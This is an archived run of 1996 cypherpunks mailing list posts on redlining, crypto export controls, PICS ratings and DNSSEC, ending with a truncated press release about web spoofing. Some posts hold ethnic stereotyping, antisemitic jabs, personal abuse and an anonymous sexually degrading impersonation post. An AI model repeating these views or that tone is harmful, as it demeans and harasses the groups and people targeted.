>web. In that middle position, the server may observe, steal
>and alter any information passing between the unfortunate
>browser and the web.
>

	This is considered *NEW* information?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Wed, 11 Dec 1996 18:44:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Check out today's Salon
In-Reply-To: <32AF118D.3970@apple.com>
Message-ID: <0mfr3d200YUf0Bmt40@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A less obnoxious URL is
<http://www.salon1999.com/news/news2961210.html>

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMq9wsckz/YzIV3P5AQHuRAMAihwGvjP5j2vX7eno1osh2w6W5ECeEQJD
ETyWYFwjopvgz5bMTMaQ8DOBSxhiWT0YZNr3jZX8Gj7uZMG1lY6ucW6bquExlYzc
O2IPmrBS+mbTrulGIh59ih5keT0ihlHb
=9IET
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 19:40:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Utility of Snake Oil FAQ
In-Reply-To: <v03007805aed4cc72495e@[207.167.93.63]>
Message-ID: <gwysyD139w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> I think it's fine that the authors of the Snake Oil FAQ generated it. To
> each their own. My approval is not needed, as the Cyperpunks group is
> neither a collective nor a democracy.

Dunno about "cyperpunks", but "cypher punks" are a bunch of clueless assholes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 21:45:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <v03007802aed4fae4d4ab@[207.167.93.63]>
Message-ID: <v03007801aed54d86a7aa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM -0600 12/11/96, Igor Chudov @ home wrote:
>Timothy C. May wrote:
>> At 5:07 PM -0600 12/11/96, Igor Chudov @ home wrote:
>> >Correlation is not an evidence of discrimination, at least to me.
>> >
>>
>> Nor is it to me. So neither of us will likely object to the neural
>> net-based lending programs which feed in a bunch of applicant data points,
>> train the net by providing feedback on who repaid their loans and with what
>> complications, etc. Even if such nets end up rejecting
>> "otherwise-qualified" (a la your other post) applicants in such a way that
>> the accept/reject ratios appear strongly correlated with certain
>> ethnicities?

>My readings on neural nets made an impression that they are not
>necessarily good at all.
>

Hardly my point, Igor.

Oh well, I guess it's pointless.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 19:44:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <v03007802aed4c09f8265@[207.167.93.63]>
Message-ID: <y7ysyD141w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> Whether to offer credit to some entity is, like many other such
> transactions, an economic transaction which involves a number of factors:
> interest rates charged, other uses for the money, expectation of payback,
> government interference (distortions of markets), etc.
>
> As with insurance in all its various forms, the decision process involves
> _probabalistic assessments_ based on avialable information, such as from
> past payback data, actuarial tables, the legal system, etc. By the nature
> of such probabalistic assesments, certain "lumped" categories will have to
> be used: age groups, sex, For example, here are just some obvious areas to
> consider:
>
> - age -- if under-25 persons have a 20% higher default rate on loans, "for
> whatever reason," this will be a factor in setting rates or even in
> granting a loan
>
> - sex -- if women are generally twice as likely to repay a loan, this will
> be a factor
>
> - ethnicity -- if persons of Norwegian heritage are 4 times less likely to
> default on a loan than persons of Blatislavan heritage are, a loan officer
> would factor this in (absent government market distortions)
>
> - education -- if college-educated persons are less likely to default than
> high school dropout, etc.
>
> ...and so on...one could make a list of several dozen categories, then run
> correlation tests of various sorts. This is clearly what banks and other
> lenders do in establishing loan criteria.

As usual, Timmy May spouts racist, anti-Semitic shit. As usual, he has
no idea what he's talking about. So what else is new...

The interest that a bank charges on a commercial loan can be thought of as
three components: a chunk to offset the anticipated effects of inflation;
a chunk that goes into a "bad debt" reserve; and a chunk that's the economic
revenue of the bank.

Imagine that a bank could set its loan rates freely, without the government
distorting the market. Two Brooklyn Jews (the kind of people Timmy May hates
with a vengeance and wants dead :-) apply for $50K loans to open little grocery
stores. The only difference is that Jew 1 (let's call him Abram) wants to open
his store in Park Slope (inhabited by Jewish Lesbians) and Jew 2 (Baruch) wants
to open his store in Morningside Heights (Blacks, Hispanics, a few Columbia
University students). The loan officer would consider the fact that Baruch's
business venture is much riskier that Abram's and charge Baruch a higher
interest rate to offset the higher risk of the default. If the banks writes a
lot of such loans, then on the average they'll have the same profit from all of
them. Think of this as the higher life insurance premiums smokers pay - they
don't add anything to the insurance company's profits. If Baruch thinks the
bank charges him too much for the added risk, he can go to another bank - there
are plenty of them.

Now consider the distorted market where a bank can't charge Abram and Baruch
different rates as determined by the free market. The bank knows precisely how
risky each loan is, but is not allowed to use this knowledge. Instead the bank
tries its best to avoid giving the loan to Baruch, because this loan would be
riskier than the equalized interest rate makes it worth. Baruch can't open a
store.* Baruch and his potential customers suffer. The bank is forced to write
some Baruch loans (fewer than it would in the previous paragraph), so it tries
to charge Abram higher rates that in the previous paragraph to offset the
losses on Baruch loans. Abram passes on some of this higher interest to his
customers. Abram and his customers suffer. Another bank might be more
successful in fending off Baruch's loan application, so it'll offer Abram a
lower interest rate, and he'll patronize that bank. Thus "socially undesirable"
behavior is rewarded. Finally, banks that don't give loans to Baruch do less
business overall, earn less profit, and their owners (shareholders) suffer.
(But they'd suffer even more of their banks loaned money to Baruch at the
same rate as to Abram, of course.)

--
* What happens in real life is - Baruch goes to another institution that issues
loans at much higher interest rates than a regular bank (often just below the
usury cap, or above if it's an unregular loan shark). Abram is welcome to
borrow there too, but he doesn't have to. The institution effectively
specializes in loans to businesses that can't obtain loans at regular lending
institutions through setting a high interest rate.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 21:50:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <3.0.32.19961211232644.006a1994@execpc.com>
Message-ID: <v03007802aed54e0ec7ae@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM -0600 12/11/96, Matthew J. Miszewski wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>>Nor is it to me. So neither of us will likely object to the neural
>>net-based lending programs which feed in a bunch of applicant data points,
>
>You will not get objections from me either.  I would advise the banks to
>make sure they accept all applicants and widely distribute the
>announcement.  I would like them to make extra efforts to examine the
>potential market in historically redlined areas.  I am not suggesting
>forcing them to do so legislatively.  I never suggested a quota system.
>
>My point is not that inputing all data you will get equivalence between
>creditworthiness and racial makeup.  My point is that redlining exists and
>I would favor the elimination of the practice.  Given a good program that
>somehow magically gets to all potential debtors would have the result I
>intend.  Not a quota system.  Equal access to capital.

You're jumping to a lot of conclusions. In fact, the neural net program
might well "rediscover redlining." Redlining is, after all, a rational
response to a situation in which data are murky, competition for loans is
strong, and the consequences of bad loans are serious.

(I recall reading around 1986 that such "black box" loan programs were in
fact "concluding" that loans to certain zip codes were not desirable.)

"Equal access to capital" remains the nonsense it has been in all of these
posts between Matthew and Red Rackham, and I won't get started on it here.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 11 Dec 1996 19:14:44 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: New export controls to include code signing applications
In-Reply-To: <v03007800aed5107ab512@[207.167.93.63]>
Message-ID: <199612120310.WAA18334@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

| of crypto software, they try to limit the export of anything with "hooks"
| for adding crypto outside the U.S., they try to limit export of crypto
| knowledge, and here they're even trying to limit _signing_ software?
| 
| What's next? Maybe they'll try to limit the dispensing of _legal advice_ by
| U.S. attorneys to foreign clients.


	I'm not sure we should be discussing what's next, or how we'll
monkey wrench it, before it comes out.  Clipper I was mishandled.
Clipper II was mishandled.  Clipper III looked like it might have had
a chance before the administration fumbled the ball with letting the
FBI have a veto.  Those folks do learn, and they may be learning from
their presence here.

	The NIST meeting, which Pat Farrel reported on, had questions
about not interacting with rouge applications, not super-encrypting a
data stream, and other things that we talked about and reminded the
Feds to deal with.

	I say let them propose; let them build systems.  Then attack
them.  Why let them release proposals that already deal with our
attacks?  

	Incidentally, was Mykrotronix a cheap buy because they bought
into Clipper?  Is that what happens to companies that try to get all
their nourishment from the GAK teat?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 11 Dec 1996 19:23:40 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: New export controls to include code signing applications
In-Reply-To: <3.0.32.19961211163934.006a08a0@netcom14.netcom.com>
Message-ID: <199612120319.WAA18401@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


These are important, and damaging changes to the regulations.  My
thanks to Lucky for pointing them out.

Previously, authentication technologies, signatures and integrity
checkers had specific exemptions.

I suggest those journalists who lurk here call companies like Digital
Pathways, McAffee, Symantec, and see if they are aware of these
proposed changes.  

Adam


Lucky Green wrote:
| It has been speculated in the past that certain crypto schemes, such as
| proposed by Microsoft and Sun, using signed crypto plugins might be helpful
| to the cause for strong crypto if non-US branches of US software companies
| would certify foreign developed crypto software.
| 
| According to the recent proposal by Commerce, this will not happen. It will
| be illegal to export the software required to sign the code. So much for
| the government's claim that they make no attempt to limit the export of
| signing-only software.
| 
| >From http://www.steptoe.com/commerce.htm
| 
| [Listing specific software prohibited from export]
| "c.2. "Software" to certify "software" controlled by 5D002.c.1; "
| 
| And, btw, virus checkers are also prohibited from export. Makes you wonder.
| 
| "c.3. "Software" designed or modified to protect against malicious computer
| damage, e.g., viruses;"
| 
| 
| -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
|    Make your mark in the history of mathematics. Use the spare cycles of
|    your PC/PPC/UNIX box to help find a new prime.
|    http://ourworld.compuserve.com/homepages/justforfun/prime.htm
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 20:20:37 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211222012.00698508@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>(Let me add that remailers are great.  I would be reluctant to express
>these ideas in any other way for professional reasons.)

hehehe.

>(Those who don't believe me should get "Love Supreme" by John Coltrane
>and listen to it carefully about 20 times.  There are layers and

And what was it that Bird's contemporary society called him?  Was it crazy?
 This is one of the social ills potentially caused by discrimination.  Far
more important to me than the politics of any time is the music that a time
period presents.  But this visionary jazz musician was all but discredited
by the musical environment of the times.  Thankfully, it survived on its
merits.  But imagine if the campaign to discredit Coltrane had been
successful and my young ears never experienced that beauty.  That is part
of the potential harm I am talking about.

>At any rate, those who wish to enlighten their fellows on the subject
>of racism can do better than "it's just wrong."

Many of us take many different routes.  Most of us fill our days taking
action and have precious little time to enlighten people other than those
they encounter daily.

>
>Red Rackham
>

Matt


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq+H+LpijqL8wiT1AQEilQQAj4OeVtlDt8OKZmQ6ntLtlG04mMmkRDMa
SDSvr0wOuWb5fDQ/TZSB681giFuGOQAtxFMsoZCOM2hodUd0FpbQqTd/EuStEMDp
/4doFWAlMoJLs9VK5cAIOppYzVl68NmUoYA/v96ZRHkIaRlV6Ovgfb0ObAB3XT+E
HZIrmY82lig=
=gn6/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Wed, 11 Dec 1996 19:37:35 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why PICS is the wrong approach
Message-ID: <3.0.32.19961211223708.0075996c@martigny.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 12/11/96 -0800, you wrote:
>
>PICS is the wrong approach becuase it oversimplifies the ratings of
>content, because it places the ratings made by the author in the payload
>itself, and because third-party ratings systems are cut out of the loop
>(effectively).

Um, first, there's nothing in the PICS spec that requires ratings to be
embedded with the content.  PICS labels can be distributed one of three ways:

1) embedded in the content, assuming there's a method of embedding defined
for the particular type of content.  (For HTML, you can put it in a META tag.)

2) sent "along-with" the content as part of the transmission protocol.
(For HTTP, there's a standard by which PICS labels can be sent as RFC-822
headers in the HTTP reply, but no one is using that to the best of my
knowledge.)

3) distributed from the third-party label bureau.

Method of distribution is independent of author of the label, too.  It's
perfectly reasonable for the author to distribute labels for his content
via a third-part label bureau, or for an author to embed a label from the
GoodMouseClicking page rating service within his document.

By the way, PICS labels nominally apply to a document named by a particular
URL.  You can elide the URL, I think, if the label is sent along with the
content or embedded within the content, but when you ask a label bureau for
labels you request them by URL.

Second, I don't see how PICS oversimplifies content rating.  If anything, I
would expect complaints that PICS complicates things too much because there
can be an infinite number of rating systems and a human is forced into the
loop to read and evaluate the meaning of any particular rating system.  It
is true that PICS currently only permits rating values to be numbers, but
enough PICS users need non-numeric values that I expect this to be changed
in January at the PICS WG meeting.

>One computerish way to think of this is that the "binding" is too early. At
>the time of distribution, say, I mark my work something with some PICS
>label, based upon my best understanding of the PICS labels, ratings,
>agencies, and laws. But once set, the "binding" has been made. Later
>reviews or reviews by other entities cannot affect the binding, at least
>not for this distributed instance.

It's true that reviewer B cannot affect reviewer A's labels, but B can make
statements about the quality of A's labels, and I can choose (in a more
general trust management environment) to accept labels only from label
authors who are vouched for by some particular vouching service.  So
GoodMouseClicking might say I'm a reliable rater of content in "Bal's
crypto-relevant rating service" but a lousy judge of pages for "Joe's cool
jazz pages rating service."

>More importantly, the "payload" does not carry some particular set of
>fairly-arbitrary PICS evluations. Binding by the censors instead of by the
>originator, which is as it should be.

The Feds obviously believe in "encouraging" self-rating as a means of
defending yourself when they haul you into court, but in general I think
people will tend to defer trust to particular third-party ratings services
that they choose over an author's self-labels.  After all, if I'm looking
for movie reviews the last thing I read is the self-promotion put out by
the distributor; I look for a third-party I know who tends to agree with my
tastes.  Same thing with product reviews (e.g. Consumer Reports) or book
reviews.  

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 20:39:04 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211223821.006a1fe4@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


(snip)
>I have no trouble believing that the student loan market would quickly
>dry up were the government to get out of the business.

Just wanted to clear up that my reference to student loans was not meant to
start a discussion of the granting of _those_ loans.  It was meant to spark
a discussion of the lending to those borrowers *after* they graduate.  As a
group, their default rate is generally high.  And yet, as a group, the
extension of credit to these people is not systematically denied (as in
redlining).

I take responsibility for the thread being confused as I believe my first
mention of it was unclear.  mea culpa.  

>
>Red Rackham
>

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq+MOLpijqL8wiT1AQFASQQAmyDZh6duHqn2EOMu6vHG4EH7YFOLC/3c
UX7WQTeFTJRdstsdot8kbooCpKq6N23m06dBjiiswAs7rLLEypywfKzC1miS5FO0
4sEh0za3Eh7QuGKZJICosl28Y2n6m8XLV8GYMVwRWdWvWMa+/xdtfHZtdji80V75
utym7+FTApY=
=/gNF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 20:42:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <v03007802aed4fae4d4ab@[207.167.93.63]>
Message-ID: <199612120438.WAA04640@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> At 5:07 PM -0600 12/11/96, Igor Chudov @ home wrote:
> >Correlation is not an evidence of discrimination, at least to me.
> >
> 
> Nor is it to me. So neither of us will likely object to the neural
> net-based lending programs which feed in a bunch of applicant data points,
> train the net by providing feedback on who repaid their loans and with what
> complications, etc. Even if such nets end up rejecting
> "otherwise-qualified" (a la your other post) applicants in such a way that
> the accept/reject ratios appear strongly correlated with certain
> ethnicities?
> 
> (Another member of the list sent me private e-mail about his experiences
> writing a "scoring program" for a bank making just the kinds of loans we're
> talking about here. He recounted his bank's very real experiences with loan
> paybacks by various ethnic and national groups. Nothing very surprising, to
> me.)

My readings on neural nets made an impression that they are not
necessarily good at all.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 20:51:55 -0800 (PST)
To: kozubik@shoelace.FirstLink.com (John Kozubik)
Subject: Re: Speaking of Redlining....
In-Reply-To: <Pine.SOL.3.91.961211200743.20030B-100000@shoelace.FirstLink.com>
Message-ID: <199612120445.WAA04706@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John Kozubik wrote:
> Please do not respond on the list, as this does not need to clog it up 
> further.
> 
> I am 19 years old, and I make 60,000 (verifiable income) per year.  I 
> have a 2000 dollar down payment.
> 
> NOBODY will give me a loan.  Everyone tells me my credit is fine, and 
> yet, I cannot get a car loan to save my life.
> 
> I have so far only tried major banks and GMAC finance.
> 
> If anyone has any information that could help me find a place in the 
> denver area that would give me a car loan (or anywhere really - money 
> can be wired from anywhere) PLEASE let me know.
> 
> I am trying to get a ~35,000 car loan - so far EVERYONE has just 
> straight up told me I am too young (even though I make twice what these 
> people make :) )
> 

Try it again with a 10,000 down payment. SHouldn't be a problem with
this kind of income.

It may help.

	- Igor, who would never buy a car costing more than 1/10 of his
	  annual income.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 11 Dec 1996 23:13:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: DNSSEC
Message-ID: <v03007801aed55b7eae23@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


Today at the IETF DNSSEC working group, the group reached consensus to send
the last of their batch of drafts for publication as a RFC.  This action
breaks the logjam and will allow DNSSEC deployment to proceed.

John Gillmore was given a round of applause because he, "Kicked our butts
to get this thing out fast."  He was the only person so honored.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 20:11:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <199612112346.PAA26588@mailmasher.com>
Message-ID: <g52syD143w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:
> Tim said in another message that there are times when discrimination
> is rational.  I have no doubt this is true.  How often do we look at a
> degree from MIT on a resume and hire?
>
> The degree to which we fear cryptoanarchy is the degree to which we
> fear leaving people alone to run their lives as they see fit.  I do
> not greatly fear cryptoanarchy.
>
> Red Rackham

Yes, even Timmy sometimes tells the truth. It's rational to discriminate
against people who don't know C when you're trying to hire someone to
write C programs. How profound.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <nobody@squirrel.owl.de>
Date: Wed, 11 Dec 1996 15:08:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: I am a stupid cocksucker
Message-ID: <19961211230334.8725.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


This Christmas Cypherpunks get a special discount: I will
suck you off for only $5.

Red Rackham

PS: I always sign my posts. I am so stupid.
PPS: Please killfile me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Wed, 11 Dec 1996 15:11:07 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com>
Subject: "Bigotry" and related topics...a brief comment
Message-ID: <199612112312.QAA07215@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <v03007801aed4bbe064e3@[207.167.93.63]>, on 12/11/96 
   at 11:47 AM, "Timothy C. May" <tcmay@got.net> said:

::The racial and ethnic groups which are most into "victimology"
::are the least successful--which is _cause_ and which is _effect_ may be
::debatable to many of you, but the correlation is very clear....maybe it's
::time they try something different, like getting their culture to embrace
::learning, reading, science, math, and business success, instead of glorifying
::victimization, crack cocaine, basketball stars, and pimps.)

    Not to harp, Tim, but the summation thought in and of itself is 
    probably "discriminatory" to many as it, intentionally or not,
    appears to single out a specific ethicnic group.

    OTOH, without or without the description, the indicated class best
    fits your model above --and I agree with the thesis; even so far as
    to say that the implentation of CA's anti-affirmative action, which
    is now blocked by yet another bleeding heart liberal Federal judge,
    will reduce tension vis a vis ethnic relations --if the supposed
    victims (of the what was at one time the ethnic majority in CA), will 
    stop crying.

    and so that everyone can see bigotry: when the demographic changes
    brought along their ethnic gangs, I moved the children to other 
    schools. when the billboards in the far NW corner of LA city/county
    were converted to Spanish a couple years ago--  

        "...that's it; we're leaving! now, regardless of the cost!"

                -attila

- --
  Now, with a black jack mule you wish to harness, you walk up, 
  look him in the eye, and hit him with a 2X4 over the left eye.   
  If he blinks, hit him over the right eye! He'll cooperate.  
        --so will politicians.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMq884704kQrCC2kFAQGjvwP/eBEPNRxueY4OOsaTfUAUGctQqdaCSOyn
DK5i3u581RTAqixccIgQbC7UpWhlmMwM4/Ildp0kcjxILUsBhoiPc2jnTbKNAejy
dI+vONbPlduWsHWAB7xIZjl7lgNqawbD7kHnm3ivGA9UNqe6NSESobgNRNy1agyI
NtgBWavsjQE=
=IZOR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Wed, 11 Dec 1996 23:23:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New export controls to include code signing applications
Message-ID: <199612120712.XAA05665@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain



At 8:31 PM 12/11/1996, Lucky Green wrote:
>In a way the new prohibition on exports of software that protects
>against malicious computer damage is even more far ranging.
>
>To quote again from the new list of enumerated items subject to
>export controls: "c.3. "Software" designed or modified to protect
>against malicious computer damage, e.g., viruses;"
>
>That includes every firewall product, every virus checker, every data
>security product, and this regardless if the product uses crypto or
>not. The new regulations go way beyond controlling crypto. The USG,
>in a massive power grip, has put data security as a whole on the
>export control list.
>
>One likely explanation for this unprecedented move is the USG's
>desire to gain further leverage with US software companies. If they
>don't include GAK, they not only won't export their crypto software,
>they won't export their other security related products either. Which
>may mean for some companies that they won't export anything at all.
>That would be a mighty big stick.

Another explanation is the USG's obvious interest in "infowar".  The
idea here would be that the US makes the best security tools and by
withholding them from the rest of the world, the US holds the
strongest hand in an "infowar".

Countries which the US wants to reward will receive "military
technology" to protect their networks, just as it does now with actual
weapons.

Just because this is totally insane doesn't mean they aren't thinking
about it.

However, all they will succeed in doing is greatly harming the U.S.
computer security business.  A few decades from now people will look
back on these policies in disbelief.

Milou






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 11 Dec 1996 23:14:30 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why PICS is the wrong approach
In-Reply-To: <v03007806aed4d0493094@[207.167.93.63]>
Message-ID: <199612120714.XAA04720@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Why TCM is wrong about PICS being wrong:

>PICS is the wrong approach becuase it oversimplifies the ratings of
>content, because it places the ratings made by the author in the payload
>itself, and because third-party ratings systems are cut out of the loop
>(effectively).

bzzzzzzt. please read about it. there are multiple protocols. some
of them allow third-party rating services. some of them support
ratings within pages. the standard is neutral.

>One computerish way to think of this is that the "binding" is too early. At
>the time of distribution, say, I mark my work something with some PICS
>label, based upon my best understanding of the PICS labels, ratings,
>agencies, and laws. But once set, the "binding" has been made. Later
>reviews or reviews by other entities cannot affect the binding, at least
>not for this distributed instance.

you have a good point, but PICS is about letting the net decide. it
supports both self-rated and third-party ratings. we will see whether
one eclipses the other in the long term. personally I suspect both
will coexist.

>And of course it is quite likely that things important to others in their
>ratings are not as important to me. I might even ignore certain points, not
>even seeing the need to point out things in the work. This is inevitable,
>as there is no uniform view of truth, no uniform set of values and
>priorities, and no hope there ever can be such a monistic view.

this is a ridiculous misunderstanding of the rating system concept.
the PICS standard expressly supports diversity by letting a thousand
rating services bloom, to borrow a phrase from your own book.  some
rating services may claim to be canonical, but you don't have to
believe them. there will be competition of rating services for a long
time into the future. this has already happened with all the filtering
software out there. 

also consider the new Firefly system that doesn't
actually have fixed ratings on objects, but in which ratings are 
determined dynamically based on your own personal ratings of pages.

 Consider
>the recent example of AOL's lists of banned words, even words in "harmless
>situations" (e.g, the example someone cited of "tits" being banned, despite
>being the name of a bird...would an animal-lovers Web page or posting with
>"Tits and Asses!!!" prominently in the title be PICS labelled as obscene?
>Some would surely think so.).

this would be an example of the most rudimentary and simplistic filtering
or rating service, which of course the market would generally ignore
in favor of more sophisticated alternative schemes.

>A much better solution is to let the unique ID block of an article--the
>Usenet article ID, or some hash of the headers, whatever--be a pointer that
>other ratings servies could then use to provide for their customers or
>clients as a filtering mechanism. This would allow as many ratings services
>to exist as clients would be willing to support.

that's exactly what PICS is about when you read about it more deeply.

>More importantly, the "payload" does not carry some particular set of
>fairly-arbitrary PICS evluations. Binding by the censors instead of by the
>originator, which is as it should be.

PICS supports both, as it was expressly designed to.

what Timmy is repeatedly failing to comprehend despite much
evidence staring him in the face is that ratings services are
going to be a very significant new information industry, if they
haven't already become one. there are now many different filtering
packages out there and the market is large for them, as has
been proven by *existing* sales. this industry will grow. yahoo
and many other indexing services are in fact implicitly
rating systems, because they utilize editorial discrimination in
deciding who to include and who to exclude.  they just don't say,
"this is rated yahoo approved" overtly.

(timmy is also upset that a massive new industry is growing without
his personal approval or anticipation. I will amuse myself by
counting the days until he does a flip in position and begins
to advocate rating system's efficacy while pretending his position
was never otherwise)

let a thousand rating systems bloom. PICS is about finding good
content as much as rejecting uninteresting content.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Dec 1996 20:16:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: NEWS: Web Security Hole Revealed
Message-ID: <v0300784baed5373421d5@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: okeefe@olympus.net
Mime-Version: 1.0
Date: Wed, 11 Dec 1996 19:32:32 -0800
To: N E W S   R E L E A S E  <IPS@olympus.net>
From: "Steve O'Keefe" <IPS@olympus.net>
Subject: NEWS: Web Security Hole Revealed

BREAKING NEWS
For Release Thursday, December 12, 1996

MAJOR  WEB  SECURITY  FLAW  REVEALED

(New York) -- Edward Felten, head of Princeton University's
Safe Internet Programming Team (SIP), today revealed a
major security flaw in the Internet's World Wide Web.
Called "web spoofing," the breach allows any Internet
